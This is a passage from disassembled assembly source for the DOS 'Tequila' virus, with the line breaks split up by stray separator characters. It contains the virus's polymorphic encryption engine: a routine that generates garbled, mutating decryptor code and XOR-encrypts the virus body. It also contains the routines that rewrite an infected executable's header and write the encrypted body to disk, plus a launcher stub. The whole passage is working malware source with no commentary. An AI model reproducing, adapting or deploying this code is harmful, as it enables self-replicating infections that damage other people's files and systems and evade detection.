MOV W[2],AX ;Masm Mod. Needed
|
|||
|
MOV AX,W[BX+014]
|
|||
|
MOV W[0],AX ;Masm Mod. Needed
|
|||
|
CALL 06A4 ;Masm Mod. Needed
|
|||
|
ADD AX,09A4
|
|||
|
ADC DX,0
|
|||
|
DIV W[0D] ;Masm Mod. Needed
|
|||
|
INC AX
|
|||
|
MOV W[0A4D],AX ;Masm Mod. Needed
|
|||
|
MOV W[0A4B],DX ;Masm Mod. Needed
|
|||
|
MOV DX,DI
|
|||
|
MOV AX,SI
|
|||
|
DIV W[0B] ;Masm Mod. Needed
|
|||
|
MOV W[0A5F],AX ;Masm Mod. Needed
|
|||
|
MOV BX,DX
|
|||
|
ADD DX,0960
|
|||
|
MOV W[0A5D],DX ;Masm Mod. Needed
|
|||
|
CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
|
|||
|
JB RET ;Masm Mod. Needed
|
|||
|
OR W[09AE],01F ;Masm Mod. Needed
|
|||
|
MOV BX,W[09BC]
|
|||
|
AND BX,01F
|
|||
|
SHL BX,1
|
|||
|
MOV AX,W[BX+0E8]
|
|||
|
MOV W[0A5B],AX ;Masm Mod. Needed
|
|||
|
CALL MOVE_TO_BEGINNING_OF_FILE
|
|||
|
MOV CX,01C
|
|||
|
MOV DX,0A49
|
|||
|
|
|||
|
WRITE_THE_NEW_HEADER:
|
|||
|
CALL 0696 ;Masm Mod. Needed
|
|||
|
OUT_OF_ENCRYPT:
|
|||
|
RET
|
|||
|
|
|||
|
COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
|
|||
|
PUSH BP
|
|||
|
XOR AH,AH
|
|||
|
INT 01A
|
|||
|
MOV AX,DX
|
|||
|
MOV BP,DX
|
|||
|
PUSH DS
|
|||
|
POP ES
|
|||
|
MOV DI,0960
|
|||
|
MOV SI,DI
|
|||
|
MOV CX,020
|
|||
|
CLD
|
|||
|
REP STOSW
|
|||
|
XOR DX,DX
|
|||
|
MOV ES,DX
|
|||
|
CALL ENCRYPT_STEP_ONE
|
|||
|
CALL ENCRYPT_STEP_TWO
|
|||
|
CALL ENCRYPT_STEP_THREE
|
|||
|
MOV B[SI],0E9
|
|||
|
MOV DI,028C
|
|||
|
SUB DI,SI
|
|||
|
SUB DI,3
|
|||
|
INC SI
|
|||
|
MOV W[SI],DI
|
|||
|
MOV AX,0A04
|
|||
|
CALL AX
|
|||
|
POP BP
|
|||
|
RET
|
|||
|
|
|||
|
ENCRYPT_STEP_ONE:
|
|||
|
DEC BP
|
|||
|
ES TEST B[BP],2 ;Masm Mod. Needed
|
|||
|
JNE 08EB ;Masm Mod. Needed
|
|||
|
MOV B[SI],0E
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
MOV B[SI],01F
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
RET
|
|||
|
MOV W[SI],0CB8C
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
MOV W[SI],0DB8E
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
RET
|
|||
|
|
|||
|
ENCRYPT_STEP_TWO:
|
|||
|
AND CH,0FE
|
|||
|
DEC BP
|
|||
|
ES TEST B[BP],2 ;Masm Mod. Needed
|
|||
|
JE 0920 ;Masm Mod. Needed
|
|||
|
OR CH,1
|
|||
|
MOV B[SI],0BE
|
|||
|
INC SI
|
|||
|
MOV W[SI],BX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
ADD BX,0960
|
|||
|
TEST CH,1
|
|||
|
JE 0934 ;Masm Mod. Needed
|
|||
|
MOV B[SI],0BB
|
|||
|
INC SI
|
|||
|
MOV W[SI],BX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
ADD BX,0960
|
|||
|
TEST CH,1
|
|||
|
JE 090C ;Masm Mod. Needed
|
|||
|
SUB BX,0960
|
|||
|
CALL GARBLER
|
|||
|
MOV B[SI],0B9
|
|||
|
INC SI
|
|||
|
MOV AX,0960
|
|||
|
MOV W[SI],AX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
CALL GARBLER
|
|||
|
RET
|
|||
|
|
|||
|
ENCRYPT_STEP_THREE:
|
|||
|
MOV AH,014
|
|||
|
MOV DH,017
|
|||
|
TEST CH,1
|
|||
|
JE 0958 ;Masm Mod. Needed
|
|||
|
XCHG DH,AH
|
|||
|
MOV DI,SI
|
|||
|
MOV AL,08A
|
|||
|
MOV W[SI],AX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
XOR DL,DL
|
|||
|
MOV B[0A39],028 ;Masm Mod. Needed
|
|||
|
DEC BP
|
|||
|
ES TEST B[BP],2 ;Masm Mod. Needed
|
|||
|
JE 0978 ;Masm Mod. Needed
|
|||
|
MOV DL,030
|
|||
|
MOV B[0A39],DL ;Masm Mod. Needed
|
|||
|
MOV W[SI],DX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
MOV W[SI],04346
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
MOV AX,0FE81
|
|||
|
MOV CL,0BE
|
|||
|
TEST CH,1
|
|||
|
JE 0993 ;Masm Mod. Needed
|
|||
|
MOV AH,0FB
|
|||
|
MOV CL,0BB
|
|||
|
MOV W[SI],AX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
PUSH BX
|
|||
|
ADD BX,040
|
|||
|
MOV W[SI],BX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
POP BX
|
|||
|
MOV B[SI],072
|
|||
|
INC SI
|
|||
|
MOV DX,SI
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
MOV B[SI],CL
|
|||
|
INC SI
|
|||
|
MOV W[SI],BX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
MOV AX,SI
|
|||
|
SUB AX,DX
|
|||
|
DEC AX
|
|||
|
MOV BX,DX
|
|||
|
MOV B[BX],AL
|
|||
|
CALL GARBLER
|
|||
|
CALL GARBLER
|
|||
|
MOV B[SI],0E2
|
|||
|
INC SI
|
|||
|
SUB DI,SI
|
|||
|
DEC DI
|
|||
|
MOV AX,DI
|
|||
|
MOV B[SI],AL
|
|||
|
INC SI
|
|||
|
CALL GARBLER
|
|||
|
RET
|
|||
|
|
|||
|
GARBLER:
|
|||
|
DEC BP
|
|||
|
ES TEST B[BP],0F ;Masm Mod. Needed
|
|||
|
JE RET ;Masm Mod. Needed
|
|||
|
DEC BP
|
|||
|
ES MOV AL,B[BP] ;Masm Mod. Needed
|
|||
|
TEST AL,2
|
|||
|
JE 0A0E ;Masm Mod. Needed
|
|||
|
TEST AL,4
|
|||
|
JE 09F7 ;Masm Mod. Needed
|
|||
|
TEST AL,8
|
|||
|
JE 09F1 ;Masm Mod. Needed
|
|||
|
MOV W[SI],0C789
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
JMP RET ;Masm Mod. Needed
|
|||
|
MOV B[SI],090
|
|||
|
INC SI
|
|||
|
JMP RET ;Masm Mod. Needed
|
|||
|
MOV AL,085
|
|||
|
DEC BP
|
|||
|
ES MOV AH,B[BP] ;Masm Mod. Needed
|
|||
|
TEST AH,2
|
|||
|
JE 0A05 ;Masm Mod. Needed
|
|||
|
DEC AL
|
|||
|
OR AH,0C0
|
|||
|
MOV W[SI],AX
|
|||
|
INC SI
|
|||
|
INC SI
|
|||
|
JMP RET ;Masm Mod. Needed
|
|||
|
DEC BP
|
|||
|
ES TEST B[BP],2 ;Masm Mod. Needed
|
|||
|
JE 0A1A ;Masm Mod. Needed
|
|||
|
MOV AL,039
|
|||
|
JMP 09F9 ;Masm Mod. Needed
|
|||
|
MOV B[SI],0FC
|
|||
|
INC SI
|
|||
|
RET
|
|||
|
|
|||
|
MAKE_THE_DISK_WRITE:
|
|||
|
CALL PERFORM_ENCRYPTION_DECRYPTION
|
|||
|
MOV AH,040
|
|||
|
MOV BX,W[09A4]
|
|||
|
MOV DX,0
|
|||
|
MOV CX,09A4
|
|||
|
PUSHF
|
|||
|
CALL D[09B4] ;Masm Mod. Needed
|
|||
|
JB 0A37 ;Masm Mod. Needed
|
|||
|
SUB AX,CX
|
|||
|
PUSHF
|
|||
|
CMP B[0A39],028 ;Masm Mod. Needed
|
|||
|
JNE 0A44 ;Masm Mod. Needed
|
|||
|
MOV B[0A39],0 ;Masm Mod. Needed
|
|||
|
CALL PERFORM_ENCRYPTION_DECRYPTION
|
|||
|
POPF
|
|||
|
RET
|
|||
|
|
|||
|
PERFORM_ENCRYPTION_DECRYPTION:
|
|||
|
MOV BX,0
|
|||
|
MOV SI,0960
|
|||
|
MOV CX,0960
|
|||
|
MOV DL,B[SI]
|
|||
|
XOR B[BX],DL
|
|||
|
INC SI
|
|||
|
INC BX
|
|||
|
CMP SI,09A0
|
|||
|
JB 0A61 ;Masm Mod. Needed
|
|||
|
MOV SI,0960
|
|||
|
LOOP 0A52 ;Masm Mod. Needed
|
|||
|
RET
|
|||
|
|
|||
|
THE_FILE_DECRYPTING_ROUTINE:
|
|||
|
PUSH CS
|
|||
|
POP DS
|
|||
|
MOV BX,4
|
|||
|
MOV SI,0964
|
|||
|
MOV CX,0960
|
|||
|
MOV DL,B[SI]
|
|||
|
ADD B[BX],DL
|
|||
|
INC SI
|
|||
|
INC BX
|
|||
|
CMP SI,09A4
|
|||
|
JB 0A7E ;Masm Mod. Needed
|
|||
|
MOV SI,0964
|
|||
|
LOOP 0A6F ;Masm Mod. Needed
|
|||
|
JMP 0390 ;Masm Mod. Needed
|
|||
|
|
|||
|
;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
|
|||
|
;========== BUT IS MERELY THE BOOSTER. ========
|
|||
|
|
|||
|
START:
|
|||
|
LEA W[0104],EXIT ;Masm Mod. Needed
|
|||
|
MOV W[0106],CS ;Masm Mod. Needed
|
|||
|
MOV BX,CS
|
|||
|
SUB W[0106],BX ;Masm Mod. Needed
|
|||
|
JMP INSTALL
|
|||
|
|
|||
|
EXIT:
|
|||
|
INT 020
|
|||
|
|
|||
|
TEQUILA ENDP
|
|||
|
CODE_SEG ENDS
|
|||
|
END TEQUILA
|